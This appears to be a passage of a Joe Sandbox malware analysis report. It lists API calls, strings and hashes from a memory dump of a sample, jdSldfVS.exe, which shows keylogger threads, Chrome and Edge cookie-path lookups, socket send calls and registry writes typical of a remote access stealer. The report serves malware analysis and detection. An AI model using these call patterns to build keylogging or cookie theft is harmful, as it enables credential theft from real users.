                        • _free.LIBCMT ref: 00444E06
                        • _free.LIBCMT ref: 00444E1D
                        • _free.LIBCMT ref: 00444E3C
                        • _free.LIBCMT ref: 00444E57
                        • _free.LIBCMT ref: 00444E6E
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: _free$AllocateHeap
                        • String ID:
                        • API String ID: 3033488037-0
                        • Opcode ID: bf8b46b868af2ecf30d3444370171b65bdd51122b8350dbbe1b9982e260663b5
                        • Instruction ID: 75a60bec03265776b93b53542ea819fdab521e44af267d44e1f719a945e8e2e2
                        • Opcode Fuzzy Hash: bf8b46b868af2ecf30d3444370171b65bdd51122b8350dbbe1b9982e260663b5
                        • Instruction Fuzzy Hash: 5451D371A00704AFEB20DF6AC841B6673F4FF85729B14456EE819D7250E739EE01CB88
                        APIs
                        • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F234), ref: 004493CF
                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 00449447
                        • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 00449474
                        • _free.LIBCMT ref: 004493BD
                          • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                          • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                        • _free.LIBCMT ref: 00449589
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                        • String ID:
                        • API String ID: 1286116820-0
                        • Opcode ID: 0a3c6fbe7e5a1f133d1032b40f823fca6b3dff27f0c0d46b4efcd8c71cfe77a6
                        • Instruction ID: c95a83c4fc9d8f5f381c6ef12c4bd90d50aad01b0883e3b7d6e96279f2ead045
                        • Opcode Fuzzy Hash: 0a3c6fbe7e5a1f133d1032b40f823fca6b3dff27f0c0d46b4efcd8c71cfe77a6
                        • Instruction Fuzzy Hash: 71511A71904205EBEB14EFA9DD819AFB7BCEF44324F10066FE51493291EB788E42DB58
                        APIs
                          • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F91B
                        • Process32FirstW.KERNEL32(00000000,?), ref: 0040F93F
                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F94E
                        • CloseHandle.KERNEL32(00000000), ref: 0040FB05
                          • Part of subcall function 0041BFE5: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F5F9,00000000,?,?,00475338), ref: 0041BFFA
                          • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                          • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FAF6
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                        • String ID:
                        • API String ID: 4269425633-0
                        • Opcode ID: 371d05c907dcca9c3c12ab80cf798e7523ffd5e5ecf3e3ca40c8afe2c02f4cbd
                        • Instruction ID: d179df5438ecf7187d550cf9263b6860c2801d48d571b2859f9d543a591e132f
                        • Opcode Fuzzy Hash: 371d05c907dcca9c3c12ab80cf798e7523ffd5e5ecf3e3ca40c8afe2c02f4cbd
                        • Instruction Fuzzy Hash: 784116311083419BC325F722DC55AEFB3A5AF94345F50493EF48A921E2EF385A49C75A
                        APIs
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: _free
                        • String ID:
                        • API String ID: 269201875-0
                        • Opcode ID: f0d0e5395ad938097262dc5d88931f0578874cbbbca0d0094bbf983591b431c8
                        • Instruction ID: 5dce3a056f7b38871bf3701478ebec2c01ef4ac0d1e4adeac0a27022f106ca0c
                        • Opcode Fuzzy Hash: f0d0e5395ad938097262dc5d88931f0578874cbbbca0d0094bbf983591b431c8
                        • Instruction Fuzzy Hash: 0741F536A012009FEB20DF78C881A5EB3F1EF89B14F2545AEE515EB341DB35AE01CB84
                        APIs
                        • GetEnvironmentStringsW.KERNEL32 ref: 0044F363
                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F386
                          • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169
                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F3AC
                        • _free.LIBCMT ref: 0044F3BF
                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F3CE
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                        • String ID:
                        • API String ID: 336800556-0
                        • Opcode ID: 02a97bdb6e6c5d26fe886d3a9ae646317caea956d8251916105bf2d3fe3a3540
                        • Instruction ID: 8337c1946637dec1c7c9c61cb05458c13fbc509b7d73539ecc926bc10a2836fd
                        • Opcode Fuzzy Hash: 02a97bdb6e6c5d26fe886d3a9ae646317caea956d8251916105bf2d3fe3a3540
                        • Instruction Fuzzy Hash: 2301B173601755BB37211ABA5C8CC7F6A6CDAC6FA5315013FFD14C2202EA68CD0581B9
                        APIs
                        • CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041C510,00000000,00000000,00000000), ref: 0041C430
                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000004,00000000,0041C510,00000000,00000000), ref: 0041C44D
                        • CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041C510,00000000,00000000), ref: 0041C459
                        • WriteFile.KERNEL32(00000000,00000000,00000000,00406F85,00000000,?,00000004,00000000,0041C510,00000000,00000000), ref: 0041C46A
                        • CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041C510,00000000,00000000), ref: 0041C477
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$CloseHandle$CreatePointerWrite
                        • String ID:
                        • API String ID: 1852769593-0
                        • Opcode ID: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
                        • Instruction ID: 5cb8be75c3dc4c1e2f747800af3fbfd5a98fa41e64789a84fd548ad7506a8702
                        • Opcode Fuzzy Hash: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
                        • Instruction Fuzzy Hash: B0110471288220FFEA104B24ACD9EFB739CEB46375F10462AF592C22C1C7259C81863A
                        APIs
                        • _free.LIBCMT ref: 004509D4
                          • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                          • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                        • _free.LIBCMT ref: 004509E6
                        • _free.LIBCMT ref: 004509F8
                        • _free.LIBCMT ref: 00450A0A
                        • _free.LIBCMT ref: 00450A1C
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: _free$ErrorFreeHeapLast
                        • String ID:
                        • API String ID: 776569668-0
                        • Opcode ID: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                        • Instruction ID: 8e1836d4b3683ea2f551dac33bf8b94159c93f8dbbc189607f67f5fa0db289e6
                        • Opcode Fuzzy Hash: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                        • Instruction Fuzzy Hash: F3F04F76504600B79620EB5DE8C2C1B73D9EA0571A795891BF66CDB612CB38FCC0869C
                        APIs
                        • _free.LIBCMT ref: 00444066
                          • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                          • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                        • _free.LIBCMT ref: 00444078
                        • _free.LIBCMT ref: 0044408B
                        • _free.LIBCMT ref: 0044409C
                        • _free.LIBCMT ref: 004440AD
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: _free$ErrorFreeHeapLast
                        • String ID:
                        • API String ID: 776569668-0
                        • Opcode ID: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                        • Instruction ID: c4ed0220327abb1134bcf7d54e43c2409a3611c90002b0fe773cef56a7474a4d
                        • Opcode Fuzzy Hash: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                        • Instruction Fuzzy Hash: 11F03AB18009208FA631AF2DBD414053B61E705769346822BF62C62A70C7B94ED2CFCF
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: PkGNG
                        • API String ID: 0-263838557
                        • Opcode ID: 6a83c2428ddcf6ea71a3f14a315267ad78d224b448d93c685a7e270e7132f7c7
                        • Instruction ID: 56b21f6c39f874414c878b072b89285690216c2d241c0ad811085e1835033e53
                        • Opcode Fuzzy Hash: 6a83c2428ddcf6ea71a3f14a315267ad78d224b448d93c685a7e270e7132f7c7
                        • Instruction Fuzzy Hash: 1B51B271D00249AAEF14DFA9C885FAFBBB8EF45314F14015FE400A7291DB78D901CBA9
                        APIs
                        • _strpbrk.LIBCMT ref: 0044E738
                        • _free.LIBCMT ref: 0044E855
                          • Part of subcall function 0043BD19: IsProcessorFeaturePresent.KERNEL32(00000017,0043BCEB,?,?,?,?,?,00000000,?,?,0043BD0B,00000000,00000000,00000000,00000000,00000000), ref: 0043BD1B
                          • Part of subcall function 0043BD19: GetCurrentProcess.KERNEL32(C0000417), ref: 0043BD3D
                          • Part of subcall function 0043BD19: TerminateProcess.KERNEL32(00000000), ref: 0043BD44
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                        • String ID: *?$.
                        • API String ID: 2812119850-3972193922
                        • Opcode ID: 6703a85dd49711e1afab558f77f60869b6155e4f96c4351f2947c71862cae23b
                        • Instruction ID: 94a4b4bbf586d133b1ca6d09685756ea089c4dad0dcc4a5060c65dcbb11523ea
                        • Opcode Fuzzy Hash: 6703a85dd49711e1afab558f77f60869b6155e4f96c4351f2947c71862cae23b
                        • Instruction Fuzzy Hash: B951C375E00109EFEF14DFAAC881AAEBBB5FF58314F25816EE454E7301E6399E018B54
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: CountEventTick
                        • String ID: !D@$NG
                        • API String ID: 180926312-2721294649
                        • Opcode ID: c3905e8113842b235930180e7962ad7fd0473fd9621d9de76edd9e6bfbddcfc2
                        • Instruction ID: 1740d3d485f2be3f914829e5aa2a54ae858af1ae40273f66f7ff2800e9d96298
                        • Opcode Fuzzy Hash: c3905e8113842b235930180e7962ad7fd0473fd9621d9de76edd9e6bfbddcfc2
                        • Instruction Fuzzy Hash: 7E51A1316083019AC724FB32D852AEF73A5AF94314F50493FF54A671E2EF3C5949C68A
                        APIs
                        • GetKeyboardLayoutNameA.USER32(?), ref: 00409ED3
                          • Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0
                          • Part of subcall function 0041C515: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409F5B,00474EE0,?,00474EE0,00000000,00474EE0,00000000), ref: 0041C52A
                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateFileKeyboardLayoutNameconnectsend
                        • String ID: XQG$NG$PG
                        • API String ID: 1634807452-3565412412
                        • Opcode ID: 54480eb0bc649cc79f0ae2d6016b7d596c1c2f6fed1d275c9adea3c12e8bc9d3
                        • Instruction ID: e0ccbd324811511655e6ba18c086c0ffec884fa52ef92f7e14ea490dcf81b303
                        • Opcode Fuzzy Hash: 54480eb0bc649cc79f0ae2d6016b7d596c1c2f6fed1d275c9adea3c12e8bc9d3
                        • Instruction Fuzzy Hash: BA5133315082415AC324F732D852AEFB3E5AFD4348F50493FF44A671E6EF78594AC649
                        APIs
                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004424DE
                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004424F3
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                        • String ID: `#D$`#D
                        • API String ID: 885266447-2450397995
                        • Opcode ID: 36fac044672f79bbd2692348072d6fa41419b258ac2755bfc370d2617ef2a991
                        • Instruction ID: d0478598ef992627c852fcfbe86add3ca1c9fa58067414995f231753f3186543
                        • Opcode Fuzzy Hash: 36fac044672f79bbd2692348072d6fa41419b258ac2755bfc370d2617ef2a991
                        • Instruction Fuzzy Hash: 78519071A00208AFDF18DF59C980AAEBBB2FB94314F59C19AF81897361D7B9DD41CB44
                        APIs
                        • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\jdSldfVS.exe,00000104), ref: 00443475
                        • _free.LIBCMT ref: 00443540
                        • _free.LIBCMT ref: 0044354A
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: _free$FileModuleName
                        • String ID: C:\Users\user\AppData\Roaming\jdSldfVS.exe
                        • API String ID: 2506810119-1144647072
                        • Opcode ID: c70776266e2bd8d98222b272a4c4964d73f1f6f6485ba9fff5740fbb3794026e
                        • Instruction ID: 78b8e4ab202bb8962dfea6a4c95dea7b8c186c0554b41bb8e719afd17783d6d0
                        • Opcode Fuzzy Hash: c70776266e2bd8d98222b272a4c4964d73f1f6f6485ba9fff5740fbb3794026e
                        • Instruction Fuzzy Hash: 2E31C471A00258BFEB21DF999C8199EBBBCEF85B15F10406BF50497311D6B89F81CB98
                        APIs
                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,00000D55,00000000,00000000,FF8BC35D,00000000,?,PkGNG,0044BB7E,?,00000000,FF8BC35D), ref: 0044B8D2
                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0044B900
                        • GetLastError.KERNEL32 ref: 0044B931
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ByteCharErrorFileLastMultiWideWrite
                        • String ID: PkGNG
                        • API String ID: 2456169464-263838557
                        • Opcode ID: f29f19b57bd44476b84c2158df793cbd226619e25f42890a5cb9caccfef44ccc
                        • Instruction ID: a4f89274a665815b2d7bd0a52cbb4c71b9b2878c435ac706d73e761117ab6cd9
                        • Opcode Fuzzy Hash: f29f19b57bd44476b84c2158df793cbd226619e25f42890a5cb9caccfef44ccc
                        • Instruction Fuzzy Hash: 18317271A002199FDB14DF59DC809EAB7B8EB48305F0444BEE90AD7260DB34ED80CBA4
                        APIs
                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066
                          • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040407C), ref: 0041B99F
                          • Part of subcall function 00418568: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E74), ref: 0041857E
                          • Part of subcall function 00418568: CloseHandle.KERNEL32(t^F,?,?,004040F5,00465E74), ref: 00418587
                          • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C49E
                        • Sleep.KERNEL32(000000FA,00465E74), ref: 00404138
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                        • String ID: /sort "Visit Time" /stext "$0NG
                        • API String ID: 368326130-3219657780
                        • Opcode ID: 074ad0252c5f85a0395eaa63b88ebd601cb6552471d06d252c91316da9998368
                        • Instruction ID: 62b88373b0174ac8ae4090b78ebfd0a8fca35ca34796720d8357018cc2c92f87
                        • Opcode Fuzzy Hash: 074ad0252c5f85a0395eaa63b88ebd601cb6552471d06d252c91316da9998368
                        • Instruction Fuzzy Hash: E9316271A0011956CB15FBA6D8969EE7375AB90308F40007FF206B71E2EF385D89CA99
                        APIs
                        • _wcslen.LIBCMT ref: 004162F5
                          • Part of subcall function 00413877: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                          • Part of subcall function 00413877: RegSetValueExA.ADVAPI32(004660A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138A0
                          • Part of subcall function 00413877: RegCloseKey.ADVAPI32(004660A4,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138AB
                          • Part of subcall function 00409DE4: _wcslen.LIBCMT ref: 00409DFD
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: _wcslen$CloseCreateValue
                        • String ID: !D@$okmode$PG
                        • API String ID: 3411444782-3370592832
                        • Opcode ID: 3229767f42b224c22e38ab05f87ced9dbd25ea478007aec8b0515c8cef1bdfe3
                        • Instruction ID: dff749dc984b923ba5de2327a6f3f9cc2e67bcaf748228c26ce3aec7d70e92d7
                        • Opcode Fuzzy Hash: 3229767f42b224c22e38ab05f87ced9dbd25ea478007aec8b0515c8cef1bdfe3
                        • Instruction Fuzzy Hash: 10119371B442011ADB187B72D832ABD22969F94358F80443FF54AAF2E2DEBD4C51525D
                        APIs
                          • Part of subcall function 0040C4C3: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C4F6
                        • PathFileExistsW.SHLWAPI(00000000), ref: 0040C61D
                        • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C688
                        Strings
                        • User Data\Default\Network\Cookies, xrefs: 0040C603
                        • User Data\Profile ?\Network\Cookies, xrefs: 0040C635
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExistsFilePath
                        • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                        • API String ID: 1174141254-1980882731
                        • Opcode ID: ec0199523fc237e56364718817167f2e0688e89b82cc13cff5a9b1f21d5ed8d2
                        • Instruction ID: e6b9b9a8142aca5ff9e4641a3ff80a721fb4b0471daa7637ae592fad8ebd6223
                        • Opcode Fuzzy Hash: ec0199523fc237e56364718817167f2e0688e89b82cc13cff5a9b1f21d5ed8d2
                        • Instruction Fuzzy Hash: B421037190011996CB14F7A2DC96CEEB738EE50319F40053FB502B31D2EF789A46C698
                        APIs
                          • Part of subcall function 0040C526: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C559
                        • PathFileExistsW.SHLWAPI(00000000), ref: 0040C6EC
                        • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C757
                        Strings
                        • User Data\Default\Network\Cookies, xrefs: 0040C6D2
                        • User Data\Profile ?\Network\Cookies, xrefs: 0040C704
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExistsFilePath
                        • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                        • API String ID: 1174141254-1980882731
                        • Opcode ID: 830e565da1f4430f56a3fad2b3585c60fae3d202001501423d8e3de01861922a
                        • Instruction ID: 83f6a23093d6b0727a30a1d550f3d6f5bdb2bb72864fa742cd8a9fd6423befd9
                        • Opcode Fuzzy Hash: 830e565da1f4430f56a3fad2b3585c60fae3d202001501423d8e3de01861922a
                        • Instruction Fuzzy Hash: AE21D37190011AD6CB05F7A2DC96CEEB778EE50719B50013FF502B31D2EF789A46C698
                        APIs
                        • CreateThread.KERNEL32(00000000,00000000,0040A27D,004750F0,00000000,00000000), ref: 0040A1FE
                        • CreateThread.KERNEL32(00000000,00000000,0040A267,004750F0,00000000,00000000), ref: 0040A20E
                        • CreateThread.KERNEL32(00000000,00000000,0040A289,004750F0,00000000,00000000), ref: 0040A21A
                          • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B172
                          • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateThread$LocalTimewsprintf
                        • String ID: Offline Keylogger Started
                        • API String ID: 465354869-4114347211
                        • Opcode ID: 739852a997fc0ae6182b294a28b4bb93c4a2cbea1e12e060c92b97aef043fd25
                        • Instruction ID: bcf1cfbdc14a627f6781ea3a40f7cea6448602225ce5b2be95dc640702f6c2bd
                        • Opcode Fuzzy Hash: 739852a997fc0ae6182b294a28b4bb93c4a2cbea1e12e060c92b97aef043fd25
                        • Instruction Fuzzy Hash: DE1194B12003187AD220B7369C86CBB765DDA8139CB00057FF946222D2EA795D54CAFB
                        APIs
                          • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B172
                          • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                          • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                        • CreateThread.KERNEL32(00000000,00000000,0040A267,?,00000000,00000000), ref: 0040AF6E
                        • CreateThread.KERNEL32(00000000,00000000,0040A289,?,00000000,00000000), ref: 0040AF7A
                        • CreateThread.KERNEL32(00000000,00000000,0040A295,?,00000000,00000000), ref: 0040AF86
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateThread$LocalTime$wsprintf
                        • String ID: Online Keylogger Started
                        • API String ID: 112202259-1258561607
                        • Opcode ID: be6d66d5fa79c5f31e74c778d4d5e15bc8bc5d5b3a82591b70bbeab99a5f0c5b
                        • Instruction ID: a86b307176fed80e65d2d8085b20e14cf0e56bf63d45b36b749a5edd9f3e52e0
                        • Opcode Fuzzy Hash: be6d66d5fa79c5f31e74c778d4d5e15bc8bc5d5b3a82591b70bbeab99a5f0c5b
                        • Instruction Fuzzy Hash: 1401C8A070031939E62076365C87D7F7A5DCA81398F40057FF645362C6D97D1C5586FB
                        APIs
                        • GetLocalTime.KERNEL32(00000000), ref: 0041B509
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: LocalTime
                        • String ID: | $%02i:%02i:%02i:%03i $PkGNG
                        • API String ID: 481472006-3277280411
                        • Opcode ID: cd8841d7ce7b31923eb0730a989a812e14017909399abac035ca2ef2887a575a
                        • Instruction ID: b0c371a91d376d28eb23a1cf2c2b6b2589463c7c7bf84255da33bc44f247512a
                        • Opcode Fuzzy Hash: cd8841d7ce7b31923eb0730a989a812e14017909399abac035ca2ef2887a575a
                        • Instruction Fuzzy Hash: 361181714082055AC304EB62D8419BFB3E9AB44348F50093FF895A21E1EF3CDA49C65A
                        APIs
                        • GetLocalTime.KERNEL32(?), ref: 00404F81
                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404FCD
                        • CreateThread.KERNEL32(00000000,00000000,00405150,?,00000000,00000000), ref: 00404FE0
                        Strings
                        • KeepAlive | Enabled | Timeout: , xrefs: 00404F94
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Create$EventLocalThreadTime
                        • String ID: KeepAlive | Enabled | Timeout:
                        • API String ID: 2532271599-1507639952
                        • Opcode ID: 7c8a9ce4b383af45d5410d66a549d3ab3812e2de270479e75a3fa2d1d41e82a0
                        • Instruction ID: 982fc92e7e47f2769c776e0d9ab1702947c5453eb715a4cfed9cf45540ca89dc
                        • Opcode Fuzzy Hash: 7c8a9ce4b383af45d5410d66a549d3ab3812e2de270479e75a3fa2d1d41e82a0
